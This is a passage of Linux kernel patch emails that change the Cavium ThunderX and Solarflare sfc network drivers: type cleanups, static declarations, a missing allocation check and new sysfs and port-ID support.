Miller --- drivers/net/ethernet/cavium/thunder/nic.h | 4 ++-- drivers/net/ethernet/cavium/thunder/nic_main.c | 8 +------- drivers/net/ethernet/cavium/thunder/nicvf_main.c | 8 ++------ drivers/net/ethernet/cavium/thunder/thunder_bgx.c | 4 ++-- drivers/net/ethernet/cavium/thunder/thunder_bgx.h | 4 ++-- 5 files changed, 9 insertions(+), 19 deletions(-) diff --git a/drivers/net/ethernet/cavium/thunder/nic.h b/drivers/net/ethernet/cavium/thunder/nic.h index 4f426db54e42..6479ce21f64c 100644 --- a/drivers/net/ethernet/cavium/thunder/nic.h +++ b/drivers/net/ethernet/cavium/thunder/nic.h @@ -301,7 +301,7 @@ struct nic_cfg_msg { u8 vf_id; u8 tns_mode; u8 node_id; - u64 mac_addr; + u8 mac_addr[ETH_ALEN]; }; /* Qset configuration */ @@ -331,7 +331,7 @@ struct sq_cfg_msg { struct set_mac_msg { u8 msg; u8 vf_id; - u64 addr; + u8 mac_addr[ETH_ALEN]; }; /* Set Maximum frame size */ diff --git a/drivers/net/ethernet/cavium/thunder/nic_main.c b/drivers/net/ethernet/cavium/thunder/nic_main.c index 3ca7ad882c10..6e0c03169a55 100644 --- a/drivers/net/ethernet/cavium/thunder/nic_main.c +++ b/drivers/net/ethernet/cavium/thunder/nic_main.c @@ -492,7 +492,6 @@ static void nic_handle_mbx_intr(struct nicpf *nic, int vf) u64 *mbx_data; u64 mbx_addr; u64 reg_addr; - u64 mac_addr; int bgx, lmac; int i; int ret = 0; @@ -555,12 +554,7 @@ static void nic_handle_mbx_intr(struct nicpf *nic, int vf) lmac = mbx.mac.vf_id; bgx = NIC_GET_BGX_FROM_VF_LMAC_MAP(nic->vf_lmac_map[lmac]); lmac = NIC_GET_LMAC_FROM_VF_LMAC_MAP(nic->vf_lmac_map[lmac]); -#ifdef __BIG_ENDIAN - mac_addr = cpu_to_be64(mbx.nic_cfg.mac_addr) << 16; -#else - mac_addr = cpu_to_be64(mbx.nic_cfg.mac_addr) >> 16; -#endif - bgx_set_lmac_mac(nic->node, bgx, lmac, (u8 *)&mac_addr); + bgx_set_lmac_mac(nic->node, bgx, lmac, mbx.mac.mac_addr); break; case NIC_MBOX_MSG_SET_MAX_FRS: ret = nic_update_hw_frs(nic, mbx.frs.max_frs, diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_main.c b/drivers/net/ethernet/cavium/thunder/nicvf_main.c index 989f005be9fd..54bba86c9534 100644 --- a/drivers/net/ethernet/cavium/thunder/nicvf_main.c +++ b/drivers/net/ethernet/cavium/thunder/nicvf_main.c @@ -197,8 +197,7 @@ static void nicvf_handle_mbx_intr(struct nicvf *nic) nic->vf_id = mbx.nic_cfg.vf_id & 0x7F; nic->tns_mode = mbx.nic_cfg.tns_mode & 0x7F; nic->node = mbx.nic_cfg.node_id; - ether_addr_copy(nic->netdev->dev_addr, - (u8 *)&mbx.nic_cfg.mac_addr); + ether_addr_copy(nic->netdev->dev_addr, mbx.nic_cfg.mac_addr); nic->link_up = false; nic->duplex = 0; nic->speed = 0; @@ -248,13 +247,10 @@ static void nicvf_handle_mbx_intr(struct nicvf *nic) static int nicvf_hw_set_mac_addr(struct nicvf *nic, struct net_device *netdev) { union nic_mbx mbx = {}; - int i; mbx.mac.msg = NIC_MBOX_MSG_SET_MAC; mbx.mac.vf_id = nic->vf_id; - for (i = 0; i < ETH_ALEN; i++) - mbx.mac.addr = (mbx.mac.addr << 8) | - netdev->dev_addr[i]; + ether_addr_copy(mbx.mac.mac_addr, netdev->dev_addr); return nicvf_send_msg_to_pf(nic, &mbx); } diff --git a/drivers/net/ethernet/cavium/thunder/thunder_bgx.c b/drivers/net/ethernet/cavium/thunder/thunder_bgx.c index cde604a93d5d..a58924cd47ed 100644 --- a/drivers/net/ethernet/cavium/thunder/thunder_bgx.c +++ b/drivers/net/ethernet/cavium/thunder/thunder_bgx.c @@ -163,7 +163,7 @@ void bgx_get_lmac_link_state(int node, int bgx_idx, int lmacid, void *status) } EXPORT_SYMBOL(bgx_get_lmac_link_state); -const char *bgx_get_lmac_mac(int node, int bgx_idx, int lmacid) +const u8 *bgx_get_lmac_mac(int node, int bgx_idx, int lmacid) { struct bgx *bgx = bgx_vnic[(node * 
MAX_BGX_PER_CN88XX) + bgx_idx]; @@ -174,7 +174,7 @@ const char *bgx_get_lmac_mac(int node, int bgx_idx, int lmacid) } EXPORT_SYMBOL(bgx_get_lmac_mac); -void bgx_set_lmac_mac(int node, int bgx_idx, int lmacid, const char *mac) +void bgx_set_lmac_mac(int node, int bgx_idx, int lmacid, const u8 *mac) { struct bgx *bgx = bgx_vnic[(node * MAX_BGX_PER_CN88XX) + bgx_idx]; diff --git a/drivers/net/ethernet/cavium/thunder/thunder_bgx.h b/drivers/net/ethernet/cavium/thunder/thunder_bgx.h index f9e2170c488a..ba4f53b7cc2c 100644 --- a/drivers/net/ethernet/cavium/thunder/thunder_bgx.h +++ b/drivers/net/ethernet/cavium/thunder/thunder_bgx.h @@ -183,8 +183,8 @@ enum MCAST_MODE { void bgx_add_dmac_addr(u64 dmac, int node, int bgx_idx, int lmac); unsigned bgx_get_map(int node); int bgx_get_lmac_count(int node, int bgx); -const char *bgx_get_lmac_mac(int node, int bgx_idx, int lmacid); -void bgx_set_lmac_mac(int node, int bgx_idx, int lmacid, const char *mac); +const u8 *bgx_get_lmac_mac(int node, int bgx_idx, int lmacid); +void bgx_set_lmac_mac(int node, int bgx_idx, int lmacid, const u8 *mac); void bgx_get_lmac_link_state(int node, int bgx_idx, int lmacid, void *status); u64 bgx_get_rx_stats(int node, int bgx_idx, int lmac, int idx); u64 bgx_get_tx_stats(int node, int bgx_idx, int lmac, int idx); From 0c886a1dd7a753e423a6577fc0507763d1b5c46f Mon Sep 17 00:00:00 2001 From: Aleksey Makarov Date: Tue, 2 Jun 2015 11:00:22 -0700 Subject: [PATCH 594/872] net: thunderx: delete unused variables They were left from development stage Reported-by: kbuild test robot Signed-off-by: Aleksey Makarov Signed-off-by: David S. Miller --- drivers/net/ethernet/cavium/thunder/thunder_bgx.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/ethernet/cavium/thunder/thunder_bgx.c b/drivers/net/ethernet/cavium/thunder/thunder_bgx.c index a58924cd47ed..83476f04aa42 100644 --- a/drivers/net/ethernet/cavium/thunder/thunder_bgx.c +++ b/drivers/net/ethernet/cavium/thunder/thunder_bgx.c @@ -38,7 +38,7 @@ struct lmac { bool is_sgmii; struct delayed_work dwork; struct workqueue_struct *check_link; -} lmac; +}; struct bgx { u8 bgx_id; @@ -50,7 +50,7 @@ struct bgx { int use_training; void __iomem *reg_base; struct pci_dev *pdev; -} bgx; +}; struct bgx *bgx_vnic[MAX_BGX_THUNDER]; static int lmac_count; /* Total no of LMACs in system */ From fd7ec06254b174b1a8170cca66ec35fea299b151 Mon Sep 17 00:00:00 2001 From: Aleksey Makarov Date: Tue, 2 Jun 2015 11:00:23 -0700 Subject: [PATCH 595/872] net: thunderx: add static This fixes sparse messages like this: drivers/net/ethernet/cavium/thunder/nicvf_main.c:1141:26: sparse: symbol 'nicvf_get_stats64' was not declared. Should it be static? Also remove unused declarations Reported-by: kbuild test robot Signed-off-by: Aleksey Makarov Signed-off-by: David S. 
Miller --- drivers/net/ethernet/cavium/thunder/nic.h | 2 -- .../net/ethernet/cavium/thunder/nicvf_main.c | 28 ++++++++----------- .../ethernet/cavium/thunder/nicvf_queues.c | 2 +- .../net/ethernet/cavium/thunder/thunder_bgx.c | 6 ++-- 4 files changed, 16 insertions(+), 22 deletions(-) diff --git a/drivers/net/ethernet/cavium/thunder/nic.h b/drivers/net/ethernet/cavium/thunder/nic.h index 6479ce21f64c..a3b43e50a576 100644 --- a/drivers/net/ethernet/cavium/thunder/nic.h +++ b/drivers/net/ethernet/cavium/thunder/nic.h @@ -413,10 +413,8 @@ int nicvf_set_real_num_queues(struct net_device *netdev, int nicvf_open(struct net_device *netdev); int nicvf_stop(struct net_device *netdev); int nicvf_send_msg_to_pf(struct nicvf *vf, union nic_mbx *mbx); -void nicvf_config_cpi(struct nicvf *nic); void nicvf_config_rss(struct nicvf *nic); void nicvf_set_rss_key(struct nicvf *nic); -void nicvf_free_skb(struct nicvf *nic, struct sk_buff *skb); void nicvf_set_ethtool_ops(struct net_device *netdev); void nicvf_update_stats(struct nicvf *nic); void nicvf_update_lmac_stats(struct nicvf *nic); diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_main.c b/drivers/net/ethernet/cavium/thunder/nicvf_main.c index 54bba86c9534..02da802d3288 100644 --- a/drivers/net/ethernet/cavium/thunder/nicvf_main.c +++ b/drivers/net/ethernet/cavium/thunder/nicvf_main.c @@ -50,10 +50,6 @@ module_param(cpi_alg, int, S_IRUGO); MODULE_PARM_DESC(cpi_alg, "PFC algorithm (0=none, 1=VLAN, 2=VLAN16, 3=IP Diffserv)"); -static int nicvf_enable_msix(struct nicvf *nic); -static netdev_tx_t nicvf_xmit(struct sk_buff *skb, struct net_device *netdev); -static void nicvf_read_bgx_stats(struct nicvf *nic, struct bgx_stats_msg *bgx); - static inline void nicvf_set_rx_frame_cnt(struct nicvf *nic, struct sk_buff *skb) { @@ -174,6 +170,14 @@ static int nicvf_check_pf_ready(struct nicvf *nic) return 1; } +static void nicvf_read_bgx_stats(struct nicvf *nic, struct bgx_stats_msg *bgx) +{ + if (bgx->rx) + nic->bgx_stats.rx_stats[bgx->idx] = bgx->stats; + else + nic->bgx_stats.tx_stats[bgx->idx] = bgx->stats; +} + static void nicvf_handle_mbx_intr(struct nicvf *nic) { union nic_mbx mbx = {}; @@ -255,7 +259,7 @@ static int nicvf_hw_set_mac_addr(struct nicvf *nic, struct net_device *netdev) return nicvf_send_msg_to_pf(nic, &mbx); } -void nicvf_config_cpi(struct nicvf *nic) +static void nicvf_config_cpi(struct nicvf *nic) { union nic_mbx mbx = {}; @@ -267,7 +271,7 @@ void nicvf_config_cpi(struct nicvf *nic) nicvf_send_msg_to_pf(nic, &mbx); } -void nicvf_get_rss_size(struct nicvf *nic) +static void nicvf_get_rss_size(struct nicvf *nic) { union nic_mbx mbx = {}; @@ -575,7 +579,7 @@ static int nicvf_poll(struct napi_struct *napi, int budget) * * As of now only CQ errors are handled */ -void nicvf_handle_qs_err(unsigned long data) +static void nicvf_handle_qs_err(unsigned long data) { struct nicvf *nic = (struct nicvf *)data; struct queue_set *qs = nic->qs; @@ -1043,14 +1047,6 @@ static int nicvf_set_mac_address(struct net_device *netdev, void *p) return 0; } -static void nicvf_read_bgx_stats(struct nicvf *nic, struct bgx_stats_msg *bgx) -{ - if (bgx->rx) - nic->bgx_stats.rx_stats[bgx->idx] = bgx->stats; - else - nic->bgx_stats.tx_stats[bgx->idx] = bgx->stats; -} - void nicvf_update_lmac_stats(struct nicvf *nic) { int stat = 0; @@ -1141,7 +1137,7 @@ void nicvf_update_stats(struct nicvf *nic) nicvf_update_sq_stats(nic, qidx); } -struct rtnl_link_stats64 *nicvf_get_stats64(struct net_device *netdev, +static struct rtnl_link_stats64 *nicvf_get_stats64(struct 
net_device *netdev, struct rtnl_link_stats64 *stats) { struct nicvf *nic = netdev_priv(netdev); diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_queues.c b/drivers/net/ethernet/cavium/thunder/nicvf_queues.c index 196246665444..7f0e108445cc 100644 --- a/drivers/net/ethernet/cavium/thunder/nicvf_queues.c +++ b/drivers/net/ethernet/cavium/thunder/nicvf_queues.c @@ -228,7 +228,7 @@ static void nicvf_free_rbdr(struct nicvf *nic, struct rbdr *rbdr) /* Refill receive buffer descriptors with new buffers. */ -void nicvf_refill_rbdr(struct nicvf *nic, gfp_t gfp) +static void nicvf_refill_rbdr(struct nicvf *nic, gfp_t gfp) { struct queue_set *qs = nic->qs; int rbdr_idx = qs->rbdr_cnt; diff --git a/drivers/net/ethernet/cavium/thunder/thunder_bgx.c b/drivers/net/ethernet/cavium/thunder/thunder_bgx.c index 83476f04aa42..633ec05dfe05 100644 --- a/drivers/net/ethernet/cavium/thunder/thunder_bgx.c +++ b/drivers/net/ethernet/cavium/thunder/thunder_bgx.c @@ -52,7 +52,7 @@ struct bgx { struct pci_dev *pdev; }; -struct bgx *bgx_vnic[MAX_BGX_THUNDER]; +static struct bgx *bgx_vnic[MAX_BGX_THUNDER]; static int lmac_count; /* Total no of LMACs in system */ static int bgx_xaui_check_link(struct lmac *lmac); @@ -253,7 +253,7 @@ static void bgx_sgmii_change_link_state(struct lmac *lmac) bgx_reg_write(bgx, lmac->lmacid, BGX_CMRX_CFG, cmr_cfg); } -void bgx_lmac_handler(struct net_device *netdev) +static void bgx_lmac_handler(struct net_device *netdev) { struct lmac *lmac = container_of(netdev, struct lmac, netdev); struct phy_device *phydev = lmac->phydev; @@ -655,7 +655,7 @@ static int bgx_lmac_enable(struct bgx *bgx, u8 lmacid) return 0; } -void bgx_lmac_disable(struct bgx *bgx, u8 lmacid) +static void bgx_lmac_disable(struct bgx *bgx, u8 lmacid) { struct lmac *lmac; u64 cmrx_cfg; From 89987844681757f68dd16b96c4d1d0cc1039183c Mon Sep 17 00:00:00 2001 From: Aleksey Makarov Date: Tue, 2 Jun 2015 11:00:24 -0700 Subject: [PATCH 596/872] net: thunderx: fix nicvf_set_rxfh() This fixes a copypaste bug that was discovered by a static analysis tool: The patch 4863dea3fab0: "net: Adding support for Cavium ThunderX network controller" from May 26, 2015, leads to the following static checker warning: drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c:517 nicvf_set_rxfh() warn: we tested 'hkey' before and it was 'false' drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c 506 /* We do not allow change in unsupported parameters */ 507 if (hkey || ^^^^ We return here. 508 (hfunc != ETH_RSS_HASH_NO_CHANGE && hfunc != ETH_RSS_HASH_TOP)) 509 return -EOPNOTSUPP; 510 511 rss->enable = true; 512 if (indir) { 513 for (idx = 0; idx < rss->rss_size; idx++) 514 rss->ind_tbl[idx] = indir[idx]; 515 } 516 517 if (hkey) { ^^^^ So this is dead code. 518 memcpy(rss->key, hkey, RSS_HASH_KEY_SIZE * sizeof(u64)); 519 nicvf_set_rss_key(nic); 520 } 521 522 nicvf_config_rss(nic); 523 return 0; 524 } regards, dan carpenter Reported-by: Dan Carpenter Signed-off-by: Aleksey Makarov Signed-off-by: David S. 
Miller --- drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c b/drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c index 0fc4a536afc9..16bd2d772db9 100644 --- a/drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c +++ b/drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c @@ -504,8 +504,7 @@ static int nicvf_set_rxfh(struct net_device *dev, const u32 *indir, } /* We do not allow change in unsupported parameters */ - if (hkey || - (hfunc != ETH_RSS_HASH_NO_CHANGE && hfunc != ETH_RSS_HASH_TOP)) + if (hfunc != ETH_RSS_HASH_NO_CHANGE && hfunc != ETH_RSS_HASH_TOP) return -EOPNOTSUPP; rss->enable = true; From 39a0dd0b5e21ce93212a1dd026abb227c92e7651 Mon Sep 17 00:00:00 2001 From: Aleksey Makarov Date: Tue, 2 Jun 2015 11:00:25 -0700 Subject: [PATCH 597/872] net: thunderx: remove unneeded type conversions No need to cast void* to u8*: pointer arithmetics works same way for both. Signed-off-by: Aleksey Makarov Signed-off-by: David S. Miller --- drivers/net/ethernet/cavium/thunder/nicvf_queues.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_queues.c b/drivers/net/ethernet/cavium/thunder/nicvf_queues.c index 7f0e108445cc..8929029613ca 100644 --- a/drivers/net/ethernet/cavium/thunder/nicvf_queues.c +++ b/drivers/net/ethernet/cavium/thunder/nicvf_queues.c @@ -62,8 +62,7 @@ static int nicvf_alloc_q_desc_mem(struct nicvf *nic, struct q_desc_mem *dmem, /* Align memory address for 'align_bytes' */ dmem->phys_base = NICVF_ALIGNED_ADDR((u64)dmem->dma, align_bytes); - dmem->base = (void *)((u8 *)dmem->unalign_base + - (dmem->phys_base - dmem->dma)); + dmem->base = dmem->unalign_base + (dmem->phys_base - dmem->dma); return 0; } From fa1a6c93afbf774d87c04f03e30cf55dc1128906 Mon Sep 17 00:00:00 2001 From: Aleksey Makarov Date: Tue, 2 Jun 2015 11:00:26 -0700 Subject: [PATCH 598/872] net: thunderx: check if memory allocation was successful This fixes a coccinelle warning: coccinelle warnings: (new ones prefixed by >>) >> drivers/net/ethernet/cavium/thunder/nicvf_queues.c:360:1-11: alloc >> with no test, possible model on line 367 vim +360 drivers/net/ethernet/cavium/thunder/nicvf_queues.c 354 err = nicvf_alloc_q_desc_mem(nic, &sq->dmem, q_len, SND_QUEUE_DESC_SIZE, 355 NICVF_SQ_BASE_ALIGN_BYTES); 356 if (err) 357 return err; 358 359 sq->desc = sq->dmem.base; > 360 sq->skbuff = kcalloc(q_len, sizeof(u64), GFP_ATOMIC); 361 sq->head = 0; 362 sq->tail = 0; 363 atomic_set(&sq->free_cnt, q_len - 1); 364 sq->thresh = SND_QUEUE_THRESH; 365 366 /* Preallocate memory for TSO segment's header */ > 367 sq->tso_hdrs = dma_alloc_coherent(&nic->pdev->dev, 368 q_len * TSO_HEADER_SIZE, 369 &sq->tso_hdrs_phys, GFP_KERNEL); 370 if (!sq->tso_hdrs) Reported-by: kbuild test robot Signed-off-by: Aleksey Makarov Signed-off-by: David S. 
Miller --- drivers/net/ethernet/cavium/thunder/nicvf_queues.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_queues.c b/drivers/net/ethernet/cavium/thunder/nicvf_queues.c index 8929029613ca..2ed7d1b7f7e8 100644 --- a/drivers/net/ethernet/cavium/thunder/nicvf_queues.c +++ b/drivers/net/ethernet/cavium/thunder/nicvf_queues.c @@ -357,6 +357,8 @@ static int nicvf_init_snd_queue(struct nicvf *nic, sq->desc = sq->dmem.base; sq->skbuff = kcalloc(q_len, sizeof(u64), GFP_ATOMIC); + if (!sq->skbuff) + return -ENOMEM; sq->head = 0; sq->tail = 0; atomic_set(&sq->free_cnt, q_len - 1); From 86ace693bb5ba54015e88bb637452d2d84f446a4 Mon Sep 17 00:00:00 2001 From: Aleksey Makarov Date: Tue, 2 Jun 2015 11:00:27 -0700 Subject: [PATCH 599/872] net: thunderx: use GFP_KERNEL in thread context GFP_KERNEL should be used in the thread context Signed-off-by: Aleksey Makarov Signed-off-by: David S. Miller --- drivers/net/ethernet/cavium/thunder/nicvf_queues.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_queues.c b/drivers/net/ethernet/cavium/thunder/nicvf_queues.c index 2ed7d1b7f7e8..d69d228d11a0 100644 --- a/drivers/net/ethernet/cavium/thunder/nicvf_queues.c +++ b/drivers/net/ethernet/cavium/thunder/nicvf_queues.c @@ -356,7 +356,7 @@ static int nicvf_init_snd_queue(struct nicvf *nic, return err; sq->desc = sq->dmem.base; - sq->skbuff = kcalloc(q_len, sizeof(u64), GFP_ATOMIC); + sq->skbuff = kcalloc(q_len, sizeof(u64), GFP_KERNEL); if (!sq->skbuff) return -ENOMEM; sq->head = 0; From 8be41320f346ee8bdcbbc866fcc8c4fdbcb6527d Mon Sep 17 00:00:00 2001 From: Shradha Shah Date: Tue, 2 Jun 2015 11:37:25 +0100 Subject: [PATCH 600/872] sfc: Add code to export port_num in netdev->dev_port In the case where we have multiple functions (PFs and VFs), this sysfs entry is useful to identify the physical port corresponding to the function we are interested in. Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/ef10.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index 4eb6ab748f06..06605abbe7c9 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -249,6 +249,7 @@ static int efx_ef10_get_mac_address_vf(struct efx_nic *efx, u8 *mac_address) static int efx_ef10_probe(struct efx_nic *efx) { struct efx_ef10_nic_data *nic_data; + struct net_device *net_dev = efx->net_dev; int i, rc; /* We can have one VI for each 8K region. However, until we @@ -329,6 +330,7 @@ static int efx_ef10_probe(struct efx_nic *efx) if (rc < 0) goto fail3; efx->port_num = rc; + net_dev->dev_port = rc; rc = efx->type->get_mac_address(efx, efx->net_dev->perm_addr); if (rc) From c9012e002b643790eb0311744cdf13e489397327 Mon Sep 17 00:00:00 2001 From: Shradha Shah Date: Tue, 2 Jun 2015 11:37:41 +0100 Subject: [PATCH 601/872] sfc: Add paranthesis correctly on all branches of the if statement This change is a stylistic change and does not affect functionality. Signed-off-by: Shradha Shah Signed-off-by: David S. 
Miller --- drivers/net/ethernet/sfc/ef10.c | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index 06605abbe7c9..14c5205200da 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -346,9 +346,9 @@ static int efx_ef10_probe(struct efx_nic *efx) * ask if it's already enabled */ rc = efx_mcdi_set_workaround(efx, MC_CMD_WORKAROUND_BUG35388, true); - if (rc == 0) + if (rc == 0) { nic_data->workaround_35388 = true; - else if (rc == -EPERM) { + } else if (rc == -EPERM) { unsigned int enabled; rc = efx_mcdi_get_workarounds(efx, NULL, &enabled); @@ -356,9 +356,9 @@ static int efx_ef10_probe(struct efx_nic *efx) goto fail3; nic_data->workaround_35388 = enabled & MC_CMD_GET_WORKAROUNDS_OUT_BUG35388; - } - else if (rc != -ENOSYS && rc != -ENOENT) + } else if (rc != -ENOSYS && rc != -ENOENT) { goto fail3; + } netif_dbg(efx, probe, efx->net_dev, "workaround for bug 35388 is %sabled\n", nic_data->workaround_35388 ? "en" : "dis"); From 0f5c0845882745bc5fde9dbbf553926435efe887 Mon Sep 17 00:00:00 2001 From: Shradha Shah Date: Tue, 2 Jun 2015 11:37:58 +0100 Subject: [PATCH 602/872] sfc: Add sysfs entry for flags (link control and primary) On every adapter there will be one primary PF per adaptor and one link control PF per port. Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/ef10.c | 58 +++++++++++++++++++++++++++++---- 1 file changed, 51 insertions(+), 7 deletions(-) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index 14c5205200da..e659da818c6c 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -246,6 +246,34 @@ static int efx_ef10_get_mac_address_vf(struct efx_nic *efx, u8 *mac_address) return 0; } +static ssize_t efx_ef10_show_link_control_flag(struct device *dev, + struct device_attribute *attr, + char *buf) +{ + struct efx_nic *efx = pci_get_drvdata(to_pci_dev(dev)); + + return sprintf(buf, "%d\n", + ((efx->mcdi->fn_flags) & + (1 << MC_CMD_DRV_ATTACH_EXT_OUT_FLAG_LINKCTRL)) + ? 1 : 0); +} + +static ssize_t efx_ef10_show_primary_flag(struct device *dev, + struct device_attribute *attr, + char *buf) +{ + struct efx_nic *efx = pci_get_drvdata(to_pci_dev(dev)); + + return sprintf(buf, "%d\n", + ((efx->mcdi->fn_flags) & + (1 << MC_CMD_DRV_ATTACH_EXT_OUT_FLAG_PRIMARY)) + ? 
1 : 0); +} + +static DEVICE_ATTR(link_control_flag, 0444, efx_ef10_show_link_control_flag, + NULL); +static DEVICE_ATTR(primary_flag, 0444, efx_ef10_show_primary_flag, NULL); + static int efx_ef10_probe(struct efx_nic *efx) { struct efx_ef10_nic_data *nic_data; @@ -315,30 +343,39 @@ static int efx_ef10_probe(struct efx_nic *efx) if (rc) goto fail3; - rc = efx_ef10_get_pf_index(efx); + rc = device_create_file(&efx->pci_dev->dev, + &dev_attr_link_control_flag); if (rc) goto fail3; + rc = device_create_file(&efx->pci_dev->dev, &dev_attr_primary_flag); + if (rc) + goto fail4; + + rc = efx_ef10_get_pf_index(efx); + if (rc) + goto fail5; + rc = efx_ef10_init_datapath_caps(efx); if (rc < 0) - goto fail3; + goto fail5; efx->rx_packet_len_offset = ES_DZ_RX_PREFIX_PKTLEN_OFST - ES_DZ_RX_PREFIX_SIZE; rc = efx_mcdi_port_get_number(efx); if (rc < 0) - goto fail3; + goto fail5; efx->port_num = rc; net_dev->dev_port = rc; rc = efx->type->get_mac_address(efx, efx->net_dev->perm_addr); if (rc) - goto fail3; + goto fail5; rc = efx_ef10_get_sysclk_freq(efx); if (rc < 0) - goto fail3; + goto fail5; efx->timer_quantum_ns = 1536000 / rc; /* 1536 cycles */ /* Check whether firmware supports bug 35388 workaround. @@ -357,7 +394,7 @@ static int efx_ef10_probe(struct efx_nic *efx) nic_data->workaround_35388 = enabled & MC_CMD_GET_WORKAROUNDS_OUT_BUG35388; } else if (rc != -ENOSYS && rc != -ENOENT) { - goto fail3; + goto fail5; } netif_dbg(efx, probe, efx->net_dev, "workaround for bug 35388 is %sabled\n", @@ -365,12 +402,16 @@ static int efx_ef10_probe(struct efx_nic *efx) rc = efx_mcdi_mon_probe(efx); if (rc && rc != -EPERM) - goto fail3; + goto fail5; efx_ptp_probe(efx, NULL); return 0; +fail5: + device_remove_file(&efx->pci_dev->dev, &dev_attr_primary_flag); +fail4: + device_remove_file(&efx->pci_dev->dev, &dev_attr_link_control_flag); fail3: efx_mcdi_fini(efx); fail2: @@ -613,6 +654,9 @@ static void efx_ef10_remove(struct efx_nic *efx) if (!nic_data->must_restore_piobufs) efx_ef10_free_piobufs(efx); + device_remove_file(&efx->pci_dev->dev, &dev_attr_primary_flag); + device_remove_file(&efx->pci_dev->dev, &dev_attr_link_control_flag); + efx_mcdi_fini(efx); efx_nic_free_buffer(efx, &nic_data->mcdi_buf); kfree(nic_data); From 1d051e009851334899e2041c3d8dcde36e2db1c2 Mon Sep 17 00:00:00 2001 From: Shradha Shah Date: Tue, 2 Jun 2015 11:38:16 +0100 Subject: [PATCH 603/872] sfc: Implement ndo_gets_phys_port_id() for EF10 VFs Signed-off-by: Shradha Shah Signed-off-by: David S. 
Miller --- drivers/net/ethernet/sfc/ef10.c | 11 +++++++++++ drivers/net/ethernet/sfc/ef10_sriov.c | 14 ++++++++++++++ drivers/net/ethernet/sfc/ef10_sriov.h | 3 +++ drivers/net/ethernet/sfc/efx.c | 1 + drivers/net/ethernet/sfc/net_driver.h | 2 ++ drivers/net/ethernet/sfc/nic.h | 1 + drivers/net/ethernet/sfc/sriov.c | 11 +++++++++++ drivers/net/ethernet/sfc/sriov.h | 2 ++ 8 files changed, 45 insertions(+) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index e659da818c6c..22c5dc3ba43b 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -406,6 +406,16 @@ static int efx_ef10_probe(struct efx_nic *efx) efx_ptp_probe(efx, NULL); +#ifdef CONFIG_SFC_SRIOV + if ((efx->pci_dev->physfn) && (!efx->pci_dev->is_physfn)) { + struct pci_dev *pci_dev_pf = efx->pci_dev->physfn; + struct efx_nic *efx_pf = pci_get_drvdata(pci_dev_pf); + + efx_pf->type->get_mac_address(efx_pf, nic_data->port_id); + } else +#endif + ether_addr_copy(nic_data->port_id, efx->net_dev->perm_addr); + return 0; fail5: @@ -4140,6 +4150,7 @@ const struct efx_nic_type efx_hunt_a0_vf_nic_type = { .vswitching_probe = efx_ef10_vswitching_probe_vf, .vswitching_restore = efx_ef10_vswitching_restore_vf, .vswitching_remove = efx_ef10_vswitching_remove_vf, + .sriov_get_phys_port_id = efx_ef10_sriov_get_phys_port_id, #endif .get_mac_address = efx_ef10_get_mac_address_vf, .set_mac_address = efx_ef10_set_mac_address, diff --git a/drivers/net/ethernet/sfc/ef10_sriov.c b/drivers/net/ethernet/sfc/ef10_sriov.c index 3969b1bf7ef3..cd524543c363 100644 --- a/drivers/net/ethernet/sfc/ef10_sriov.c +++ b/drivers/net/ethernet/sfc/ef10_sriov.c @@ -736,3 +736,17 @@ int efx_ef10_sriov_get_vf_config(struct efx_nic *efx, int vf_i, return 0; } + +int efx_ef10_sriov_get_phys_port_id(struct efx_nic *efx, + struct netdev_phys_item_id *ppid) +{ + struct efx_ef10_nic_data *nic_data = efx->nic_data; + + if (!is_valid_ether_addr(nic_data->port_id)) + return -EOPNOTSUPP; + + ppid->id_len = ETH_ALEN; + memcpy(ppid->id, nic_data->port_id, ppid->id_len); + + return 0; +} diff --git a/drivers/net/ethernet/sfc/ef10_sriov.h b/drivers/net/ethernet/sfc/ef10_sriov.h index b98557670f73..ffc92a504c3f 100644 --- a/drivers/net/ethernet/sfc/ef10_sriov.h +++ b/drivers/net/ethernet/sfc/ef10_sriov.h @@ -54,6 +54,9 @@ int efx_ef10_sriov_get_vf_config(struct efx_nic *efx, int vf_i, int efx_ef10_sriov_set_vf_link_state(struct efx_nic *efx, int vf_i, int link_state); +int efx_ef10_sriov_get_phys_port_id(struct efx_nic *efx, + struct netdev_phys_item_id *ppid); + int efx_ef10_vswitching_probe_pf(struct efx_nic *efx); int efx_ef10_vswitching_probe_vf(struct efx_nic *efx); int efx_ef10_vswitching_restore_pf(struct efx_nic *efx); diff --git a/drivers/net/ethernet/sfc/efx.c b/drivers/net/ethernet/sfc/efx.c index 2d4853c032c3..de16cec7ec61 100644 --- 